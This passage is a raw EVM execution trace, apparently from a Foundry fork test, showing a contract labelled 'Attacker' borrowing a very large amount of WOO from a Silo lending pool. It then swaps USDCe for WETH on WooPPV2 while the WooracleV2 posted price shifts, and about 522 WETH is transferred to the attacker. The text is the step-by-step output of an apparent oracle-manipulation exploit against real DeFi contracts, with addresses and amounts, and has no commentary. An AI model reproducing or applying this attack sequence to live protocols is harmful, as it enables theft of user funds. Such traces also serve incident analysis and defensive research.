    │   │   │   │   │   │   │   ├─ [2465] 0x3f770Ac673856F105b586bb393d122721265aD46::balanceOf(Silo: [0x5C2B80214c1961dB06f69DD4128BcfFc6423d44F]) [delegatecall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 5092663209802375827262435 [5.092e24]
    │   │   │   │   │   │   │   └─ ← [Return] 5092663209802375827262435 [5.092e24]
    │   │   │   │   │   │   └─ ← [Return] 5092663209802375827262435 [5.092e24]
    │   │   │   │   │   ├─ [357564] Silo::borrow(WOO: [0xcAFcD85D8ca7Ad1e1C6F82F651fA15E33AEfD07b], 5092663209802375827262435 [5.092e24])
    │   │   │   │   │   │   ├─ [3301] 0x8658047e48CC09161f4152c79155Dac1d710Ff0a::isSiloPaused(Silo: [0x5C2B80214c1961dB06f69DD4128BcfFc6423d44F], WOO: [0xcAFcD85D8ca7Ad1e1C6F82F651fA15E33AEfD07b]) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   │   │   ├─ [2872] 0x8658047e48CC09161f4152c79155Dac1d710Ff0a::getInterestRateModel(Silo: [0x5C2B80214c1961dB06f69DD4128BcfFc6423d44F], WOO: [0xcAFcD85D8ca7Ad1e1C6F82F651fA15E33AEfD07b]) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000374d79ef2a75d5d25a4ce163d85ab0b579171d6c
    │   │   │   │   │   │   ├─ [40011] 0x374D79ef2A75d5D25A4Ce163D85AB0b579171d6c::getCompoundInterestRateAndUpdate(WOO: [0xcAFcD85D8ca7Ad1e1C6F82F651fA15E33AEfD07b], 1709653326 [1.709e9])
    │   │   │   │   │   │   │   ├─ [5163] Silo::utilizationData(WOO: [0xcAFcD85D8ca7Ad1e1C6F82F651fA15E33AEfD07b]) [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000004534843933fb26b61c915000000000000000000000000000000000000000000001cdec982cabf0f6596860000000000000000000000000000000000000000000000000000000065e5fa6d
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0xdf9f9c8467b86cd02fc3f701f9fa38ebc17d9239b7822c54e36a23c2a0777171: 0x000000000000000000000000000000000000000000000000000000000de31afb → 0x000000000000000000000000000000000000000000000000000000000ec8a977
    │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000012a5700b61fd
    │   │   │   │   │   │   ├─ [439] 0x8658047e48CC09161f4152c79155Dac1d710Ff0a::protocolShareFee() [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000003782dace9d90000
    │   │   │   │   │   │   ├─ [2579] 0x1d7000d36115dd2116f2401024583b973CaA0D54::balanceOf(Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   │   ├─ [2579] 0x8B94112a3B5669B176015A38C19383a8C0B0c69A::balanceOf(Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   │   ├─ [1602] WOO::balanceOf(Silo: [0x5C2B80214c1961dB06f69DD4128BcfFc6423d44F]) [staticcall]
    │   │   │   │   │   │   │   ├─ [337] 0xE72ba9418b5f2Ce0A6a40501Fe77c6839Aa37333::implementation() [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x3f770Ac673856F105b586bb393d122721265aD46
    │   │   │   │   │   │   │   ├─ [465] 0x3f770Ac673856F105b586bb393d122721265aD46::balanceOf(Silo: [0x5C2B80214c1961dB06f69DD4128BcfFc6423d44F]) [delegatecall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 5092663209802375827262435 [5.092e24]
    │   │   │   │   │   │   │   └─ ← [Return] 5092663209802375827262435 [5.092e24]
    │   │   │   │   │   │   ├─ [413] 0x8658047e48CC09161f4152c79155Dac1d710Ff0a::entryFee() [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   │   │   ├─ [2349] 0x602dB6e46B41bc2B9e2c6b3F8594C49CF8B8857D::totalSupply() [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 136104211261921156804284 [1.361e23]
    │   │   │   │   │   │   ├─ [35483] 0x602dB6e46B41bc2B9e2c6b3F8594C49CF8B8857D::mint(Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 5083902323623058456015968 [5.083e24])
    │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 5083902323623058456015968 [5.083e24])
    │   │   │   │   │   │   │   ├─ [305] Silo::siloRepository() [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000008658047e48cc09161f4152c79155dac1d710ff0a
    │   │   │   │   │   │   │   ├─ [642] 0x8658047e48CC09161f4152c79155Dac1d710Ff0a::getNotificationReceiver(Silo: [0x5C2B80214c1961dB06f69DD4128BcfFc6423d44F]) [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000d592f705bdc8c1b439bd4d665ed99c4faad5a680
    │   │   │   │   │   │   │   ├─ [2767] 0xd592F705bDC8C1B439Bd4D665Ed99C4FaAd5A680::onAfterTransfer(0x602dB6e46B41bc2B9e2c6b3F8594C49CF8B8857D, 0x0000000000000000000000000000000000000000, Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 5083902323623058456015968 [5.083e24])
    │   │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   │   ├─ emit NotificationSent(param0: 0xd592F705bDC8C1B439Bd4D665Ed99C4FaAd5A680, param1: true)
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 2: 0x000000000000000000000000000000000000000000001cd2395d17b35abe2ebc → 0x0000000000000000000000000000000000000000000451611f0be9f3785ba31c
    │   │   │   │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x00000000000000000000000000000000000000000004348ee5aed2401d9d7460
    │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   ├─ emit Borrow(param0: WOO: [0xcAFcD85D8ca7Ad1e1C6F82F651fA15E33AEfD07b], param1: Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param2: 5092663209802375827262435 [5.092e24])
    │   │   │   │   │   │   ├─ [7327] WOO::transfer(Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 5092663209802375827262435 [5.092e24])
    │   │   │   │   │   │   │   ├─ [337] 0xE72ba9418b5f2Ce0A6a40501Fe77c6839Aa37333::implementation() [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x3f770Ac673856F105b586bb393d122721265aD46
    │   │   │   │   │   │   │   ├─ [6187] 0x3f770Ac673856F105b586bb393d122721265aD46::transfer(Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 5092663209802375827262435 [5.092e24]) [delegatecall]
    │   │   │   │   │   │   │   │   ├─ emit Transfer(from: Silo: [0x5C2B80214c1961dB06f69DD4128BcfFc6423d44F], to: Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 5092663209802375827262435 [5.092e24])
    │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   @ 0xf85b56951f6ca259eb015e4162809ffc1dd28bc06ffa5a7aa716f2780313bdca: 0x000000000000000000000000000000000000000000023cb6623e110c5808cb69 → 0x00000000000000000000000000000000000000000006732035a50e3936bc574c
    │   │   │   │   │   │   │   │   │   @ 0x4a118db3f320de5789eb241d5a09272e3d70541292a2d8e35e3916f8589e6a3e: 0x000000000000000000000000000000000000000000043669d366fd2cdeb38be3 → 0
    │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   ├─ [872] 0x8658047e48CC09161f4152c79155Dac1d710Ff0a::getInterestRateModel(Silo: [0x5C2B80214c1961dB06f69DD4128BcfFc6423d44F], WOO: [0xcAFcD85D8ca7Ad1e1C6F82F651fA15E33AEfD07b]) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000374d79ef2a75d5d25a4ce163d85ab0b579171d6c
    │   │   │   │   │   │   ├─ [14368] 0x374D79ef2A75d5D25A4Ce163D85AB0b579171d6c::getCompoundInterestRate(Silo: [0x5C2B80214c1961dB06f69DD4128BcfFc6423d44F], WOO: [0xcAFcD85D8ca7Ad1e1C6F82F651fA15E33AEfD07b], 1709653326 [1.709e9]) [staticcall]
    │   │   │   │   │   │   │   ├─ [1163] Silo::utilizationData(WOO: [0xcAFcD85D8ca7Ad1e1C6F82F651fA15E33AEfD07b]) [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000004534860aaf68cfd315ac7000000000000000000000000000000000000000000045348c3b4110f5b2de4ab0000000000000000000000000000000000000000000000000000000065e73d4e
    │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   │   │   ├─ [579] 0x602dB6e46B41bc2B9e2c6b3F8594C49CF8B8857D::balanceOf(Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 5083902323623058456015968 [5.083e24]
    │   │   │   │   │   │   ├─ [349] 0x602dB6e46B41bc2B9e2c6b3F8594C49CF8B8857D::totalSupply() [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 5220006534884979612820252 [5.22e24]
    │   │   │   │   │   │   ├─ [2872] 0x8658047e48CC09161f4152c79155Dac1d710Ff0a::getInterestRateModel(Silo: [0x5C2B80214c1961dB06f69DD4128BcfFc6423d44F], WETH: [0x82aF49447D8a07e3bd95BD0d56f35241523fBab1]) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000374d79ef2a75d5d25a4ce163d85ab0b579171d6c
    │   │   │   │   │   │   ├─ [34885] 0x374D79ef2A75d5D25A4Ce163D85AB0b579171d6c::getCompoundInterestRate(Silo: [0x5C2B80214c1961dB06f69DD4128BcfFc6423d44F], WETH: [0x82aF49447D8a07e3bd95BD0d56f35241523fBab1], 1709653326 [1.709e9]) [staticcall]
    │   │   │   │   │   │   │   ├─ [3163] Silo::utilizationData(WETH: [0x82aF49447D8a07e3bd95BD0d56f35241523fBab1]) [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000002a186545fb83e163f000000000000000000000000000000000000000000000000012de6cdf88fc86a0000000000000000000000000000000000000000000000000000000065e6a597
    │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000000293e09aa9f
    │   │   │   │   │   │   ├─ [2579] 0xf13a33bd14D05B869B8f97095b63cae84d573852::balanceOf(Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   │   ├─ [872] 0x8658047e48CC09161f4152c79155Dac1d710Ff0a::getInterestRateModel(Silo: [0x5C2B80214c1961dB06f69DD4128BcfFc6423d44F], USDCe: [0xFF970A61A04b1cA14834A43f5dE4533eBDDB5CC8]) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000374d79ef2a75d5d25a4ce163d85ab0b579171d6c
    │   │   │   │   │   │   ├─ [12709] 0x374D79ef2A75d5D25A4Ce163D85AB0b579171d6c::getCompoundInterestRate(Silo: [0x5C2B80214c1961dB06f69DD4128BcfFc6423d44F], USDCe: [0xFF970A61A04b1cA14834A43f5dE4533eBDDB5CC8], 1709653326 [1.709e9]) [staticcall]
    │   │   │   │   │   │   │   ├─ [1163] Silo::utilizationData(USDCe: [0xFF970A61A04b1cA14834A43f5dE4533eBDDB5CC8]) [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000000b79aa4eb400000000000000000000000000000000000000000000000000000006e401a08f70000000000000000000000000000000000000000000000000000000065e73d4e
    │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   │   │   ├─ [579] 0xDa3abf6F119E2D573e9a56E9679c0f87D4547799::balanceOf(Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   │   ├─ [426] 0x8658047e48CC09161f4152c79155Dac1d710Ff0a::priceProvidersRepository() [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000005bf4e67127263d951fc515e23b323d0e3b4485fd
    │   │   │   │   │   │   ├─ [32219] 0x5bf4E67127263D951FC515E23B323d0e3b4485fd::getPrice(WOO: [0xcAFcD85D8ca7Ad1e1C6F82F651fA15E33AEfD07b]) [staticcall]
    │   │   │   │   │   │   │   ├─ [29006] 0x9d0DDE842801448534263FF23C629EDC6B6B31ee::getPrice(WOO: [0xcAFcD85D8ca7Ad1e1C6F82F651fA15E33AEfD07b]) [staticcall]
    │   │   │   │   │   │   │   │   ├─ [16043] 0x5e2b5C5C07cCA3437c4D724225Bb42c7E55d1597::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   ├─ [7612] 0x807EB1664b774F37E23d7Ea4a384028cC888c511::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 12769 [1.276e4], 56521170 [5.652e7], 1709653195 [1.709e9], 1709653195 [1.709e9], 12769 [1.276e4]
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 18446744073709564385 [1.844e19], 56521170 [5.652e7], 1709653195 [1.709e9], 1709653195 [1.709e9], 18446744073709564385 [1.844e19]
    │   │   │   │   │   │   │   │   ├─ [3143] 0x639Fe6ab55C921f74e7fac1ee960C0B6293ba612::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   ├─ [1410] 0x3607e46698d218B3a5Cae44bF381475C0a5e2ca7::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 531576 [5.315e5], 380824500000 [3.808e11], 1709653291 [1.709e9], 1709653291 [1.709e9], 531576 [5.315e5]
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 18446744073710083192 [1.844e19], 380824500000 [3.808e11], 1709653291 [1.709e9], 1709653291 [1.709e9], 18446744073710083192 [1.844e19]
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000086fc3bceaf0e
    │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000086fc3bceaf0e
    │   │   │   │   │   │   ├─ [5635] WOO::decimals() [staticcall]
    │   │   │   │   │   │   │   ├─ [337] 0xE72ba9418b5f2Ce0A6a40501Fe77c6839Aa37333::implementation() [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x3f770Ac673856F105b586bb393d122721265aD46
    │   │   │   │   │   │   │   ├─ [4501] 0x3f770Ac673856F105b586bb393d122721265aD46::decimals() [delegatecall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 18
    │   │   │   │   │   │   │   └─ ← [Return] 18
    │   │   │   │   │   │   ├─ [579] 0x1d7000d36115dd2116f2401024583b973CaA0D54::balanceOf(Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   │   ├─ [579] 0x8B94112a3B5669B176015A38C19383a8C0B0c69A::balanceOf(Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   │   ├─ [2579] 0x80daea7BaeB639cee9cD9eE50d2a52A093A4f20C::balanceOf(Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   │   ├─ [2579] 0xED3AD20403530B38fb3dFb85273d47765AD2b713::balanceOf(Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   │   ├─ [2579] 0x51DdFa50752782089d032DD293e4650dAf16F151::balanceOf(Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   │   ├─ [579] 0xF1A6fa898964b0DE464b19f3496d9145Fc7C4124::balanceOf(Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 7000000000000 [7e12]
    │   │   │   │   │   │   ├─ [872] 0x8658047e48CC09161f4152c79155Dac1d710Ff0a::getInterestRateModel(Silo: [0x5C2B80214c1961dB06f69DD4128BcfFc6423d44F], USDCe: [0xFF970A61A04b1cA14834A43f5dE4533eBDDB5CC8]) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000374d79ef2a75d5d25a4ce163d85ab0b579171d6c
    │   │   │   │   │   │   ├─ [12709] 0x374D79ef2A75d5D25A4Ce163D85AB0b579171d6c::getCompoundInterestRate(Silo: [0x5C2B80214c1961dB06f69DD4128BcfFc6423d44F], USDCe: [0xFF970A61A04b1cA14834A43f5dE4533eBDDB5CC8], 1709653326 [1.709e9]) [staticcall]
    │   │   │   │   │   │   │   ├─ [1163] Silo::utilizationData(USDCe: [0xFF970A61A04b1cA14834A43f5dE4533eBDDB5CC8]) [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000000b79aa4eb400000000000000000000000000000000000000000000000000000006e401a08f70000000000000000000000000000000000000000000000000000000065e73d4e
    │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   │   │   ├─ [349] 0xF1A6fa898964b0DE464b19f3496d9145Fc7C4124::totalSupply() [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 7000000000000 [7e12]
    │   │   │   │   │   │   ├─ [10819] 0x5bf4E67127263D951FC515E23B323d0e3b4485fd::getPrice(USDCe: [0xFF970A61A04b1cA14834A43f5dE4533eBDDB5CC8]) [staticcall]
    │   │   │   │   │   │   │   ├─ [9606] 0x9d0DDE842801448534263FF23C629EDC6B6B31ee::getPrice(USDCe: [0xFF970A61A04b1cA14834A43f5dE4533eBDDB5CC8]) [staticcall]
    │   │   │   │   │   │   │   │   ├─ [3143] 0x50834F3163758fcC1Df9973b6e91f0F0F0434aD3::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   ├─ [1410] 0x2946220288DbBF77dF0030fCecc2a8348CbBE32C::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 4688, 99997820 [9.999e7], 1709641592 [1.709e9], 1709641592 [1.709e9], 4688
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 18446744073709556304 [1.844e19], 99997820 [9.999e7], 1709641592 [1.709e9], 1709641592 [1.709e9], 18446744073709556304 [1.844e19]
    │   │   │   │   │   │   │   │   ├─ [3143] 0x639Fe6ab55C921f74e7fac1ee960C0B6293ba612::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   ├─ [1410] 0x3607e46698d218B3a5Cae44bF381475C0a5e2ca7::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 531576 [5.315e5], 380824500000 [3.808e11], 1709653291 [1.709e9], 1709653291 [1.709e9], 531576 [5.315e5]
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 18446744073710083192 [1.844e19], 380824500000 [3.808e11], 1709653291 [1.709e9], 1709653291 [1.709e9], 18446744073710083192 [1.844e19]
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000eed13c0e2b8e
    │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000eed13c0e2b8e
    │   │   │   │   │   │   ├─ [1121] USDCe::decimals() [staticcall]
    │   │   │   │   │   │   │   ├─ [381] 0x1eFB3f88Bc88f03FD1804A5C53b7141bbEf5dED8::decimals() [delegatecall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 6
    │   │   │   │   │   │   │   └─ ← [Return] 6
    │   │   │   │   │   │   ├─ [2860] 0x8658047e48CC09161f4152c79155Dac1d710Ff0a::getMaximumLTV(Silo: [0x5C2B80214c1961dB06f69DD4128BcfFc6423d44F], WOO: [0xcAFcD85D8ca7Ad1e1C6F82F651fA15E33AEfD07b]) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000006f05b59d3b20000
    │   │   │   │   │   │   ├─ [2860] 0x8658047e48CC09161f4152c79155Dac1d710Ff0a::getMaximumLTV(Silo: [0x5C2B80214c1961dB06f69DD4128BcfFc6423d44F], WETH: [0x82aF49447D8a07e3bd95BD0d56f35241523fBab1]) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000006f05b59d3b20000
    │   │   │   │   │   │   ├─ [2860] 0x8658047e48CC09161f4152c79155Dac1d710Ff0a::getMaximumLTV(Silo: [0x5C2B80214c1961dB06f69DD4128BcfFc6423d44F], USDCe: [0xFF970A61A04b1cA14834A43f5dE4533eBDDB5CC8]) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000006f05b59d3b20000
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0xa67311e583312b738201845121e7ea8c2334e5cbac9715bf56d67636eeb16730: 0x000000000000000000000000000000000000000000000001550da4321ed6cba7 → 0x0000000000000000000000000000000000000000000000015ec0367afa1bfc37
    │   │   │   │   │   │   │   @ 0x711c36c722391b71407d4faab02e12b0ddd979f3873ac3c5d441c3cd017f468f: 0x000000000000000000000000000000000000000000001cdec982cabf0f659686 → 0x000000000000000000000000000000000000000000045348c3b4110f5b2de4ab
    │   │   │   │   │   │   │   @ 0xa67311e583312b738201845121e7ea8c2334e5cbac9715bf56d67636eeb16731: 0x0000000000000000000000000000000000000000000000010000000065e5fa6d → 0x0000000000000000000000000000000000000000000000010000000065e73d4e
    │   │   │   │   │   │   │   @ 0x711c36c722391b71407d4faab02e12b0ddd979f3873ac3c5d441c3cd017f468d: 0x00000000000000000000000000000000000000000004534843933fb26b61c915 → 0x00000000000000000000000000000000000000000004534860aaf68cfd315ac7
    │   │   │   │   │   │   └─ ← [Return] 5092663209802375827262435 [5.092e24], 5083902323623058456015968 [5.083e24]
    │   │   │   │   │   ├─ [9497] USDCe::transfer(WooPPV2: [0xeFF23B4bE1091b53205E35f3AfCD9C7182bf3062], 2000000000000 [2e12])
    │   │   │   │   │   │   ├─ [8751] 0x1eFB3f88Bc88f03FD1804A5C53b7141bbEf5dED8::transfer(WooPPV2: [0xeFF23B4bE1091b53205E35f3AfCD9C7182bf3062], 2000000000000 [2e12]) [delegatecall]
    │   │   │   │   │   │   │   ├─ emit Transfer(from: Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: WooPPV2: [0xeFF23B4bE1091b53205E35f3AfCD9C7182bf3062], value: 2000000000000 [2e12])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0x3294e31e857a8281d7b20b9a55b81a6c7534af3c5a5b8bbb1d370446531369f7: 0x000000000000000000000000000000000000000000000000000001c5d37a8a94 → 0x000000000000000000000000000000000000000000000000000003977cc4aa94
    │   │   │   │   │   │   │   │   @ 0xf85b56951f6ca259eb015e4162809ffc1dd28bc06ffa5a7aa716f2780313bdca: 0x00000000000000000000000000000000000000000000000000000340b4d3e58c → 0x0000000000000000000000000000000000000000000000000000016f0b89c58c
    │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [111440] WooPPV2::swap(USDCe: [0xFF970A61A04b1cA14834A43f5dE4533eBDDB5CC8], WETH: [0x82aF49447D8a07e3bd95BD0d56f35241523fBab1], 2000000000000 [2e12], 0, Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   │   │   ├─ [1296] USDCe::balanceOf(WooPPV2: [0xeFF23B4bE1091b53205E35f3AfCD9C7182bf3062]) [staticcall]
    │   │   │   │   │   │   │   ├─ [553] 0x1eFB3f88Bc88f03FD1804A5C53b7141bbEf5dED8::balanceOf(WooPPV2: [0xeFF23B4bE1091b53205E35f3AfCD9C7182bf3062]) [delegatecall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 3949168208532 [3.949e12]
    │   │   │   │   │   │   │   └─ ← [Return] 3949168208532 [3.949e12]
    │   │   │   │   │   │   ├─ [25267] WooracleV2::state(WETH: [0x82aF49447D8a07e3bd95BD0d56f35241523fBab1]) [staticcall]
    │   │   │   │   │   │   │   ├─ [3143] 0x639Fe6ab55C921f74e7fac1ee960C0B6293ba612::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   ├─ [1410] 0x3607e46698d218B3a5Cae44bF381475C0a5e2ca7::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 531576 [5.315e5], 380824500000 [3.808e11], 1709653291 [1.709e9], 1709653291 [1.709e9], 531576 [5.315e5]
    │   │   │   │   │   │   │   │   └─ ← [Return] 18446744073710083192 [1.844e19], 380824500000 [3.808e11], 1709653291 [1.709e9], 1709653291 [1.709e9], 18446744073710083192 [1.844e19]
    │   │   │   │   │   │   │   ├─ [3143] 0x50834F3163758fcC1Df9973b6e91f0F0F0434aD3::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   ├─ [1410] 0x2946220288DbBF77dF0030fCecc2a8348CbBE32C::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 4688, 99997820 [9.999e7], 1709641592 [1.709e9], 1709641592 [1.709e9], 4688
    │   │   │   │   │   │   │   │   └─ ← [Return] 18446744073709556304 [1.844e19], 99997820 [9.999e7], 1709641592 [1.709e9], 1709641592 [1.709e9], 18446744073709556304 [1.844e19]
    │   │   │   │   │   │   │   └─ ← [Return] State({ price: 381661997086 [3.816e11], spread: 1050000000000000 [1.05e15], coeff: 1000000000 [1e9], woFeasible: true })
    │   │   │   │   │   │   ├─ [673] WooracleV2::decimals(WETH: [0x82aF49447D8a07e3bd95BD0d56f35241523fBab1]) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000008
    │   │   │   │   │   │   ├─ [1121] USDCe::decimals() [staticcall]
    │   │   │   │   │   │   │   ├─ [381] 0x1eFB3f88Bc88f03FD1804A5C53b7141bbEf5dED8::decimals() [delegatecall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 6
    │   │   │   │   │   │   │   └─ ← [Return] 6
    │   │   │   │   │   │   ├─ [3076] WETH::decimals() [staticcall]
    │   │   │   │   │   │   │   ├─ [2336] 0x8b194bEae1d3e0788A1a35173978001ACDFba668::decimals() [delegatecall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 18
    │   │   │   │   │   │   │   └─ ← [Return] 18
    │   │   │   │   │   │   ├─ [10070] WooracleV2::postPrice(WETH: [0x82aF49447D8a07e3bd95BD0d56f35241523fBab1], 383188263412 [3.831e11])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0xe089b3d2d906248bcc0697b394370f473d6eca7b99fcb3dd193f26c163147b83: 0x0003baf82d03a000000000003b9aca00000000000000000000000058dcd3e81e → 0x0003baf82d03a000000000003b9aca0000000000000000000000005937cce1f4
    │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   ├─ [28900] WETH::transfer(Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 522295261244159469020 [5.222e20])
    │   │   │   │   │   │   │   ├─ [28154] 0x8b194bEae1d3e0788A1a35173978001ACDFba668::transfer(Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 522295261244159469020 [5.222e20]) [delegatecall]
    │   │   │   │   │   │   │   │   ├─ emit Transfer(from: WooPPV2: [0xeFF23B4bE1091b53205E35f3AfCD9C7182bf3062], to: Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 522295261244159469020 [5.222e20])
    │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   @ 0x3294e31e857a8281d7b20b9a55b81a6c7534af3c5a5b8bbb1d370446531369f7: 0x00000000000000000000000000000000000000000000004b37078859347f2328 → 0x00000000000000000000000000000000000000000000002ee6ba037c5c867d4c
    │   │   │   │   │   │   │   │   │   @ 0xf85b56951f6ca259eb015e4162809ffc1dd28bc06ffa5a7aa716f2780313bdca: 0 → 0x00000000000000000000000000000000000000000000001c504d84dcd7f8a5dc
    │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   ├─  emit topic 0: 0x0e8e403c2d36126272b08c75823e988381d9dc47f2f0a9a080d95f891d95c469
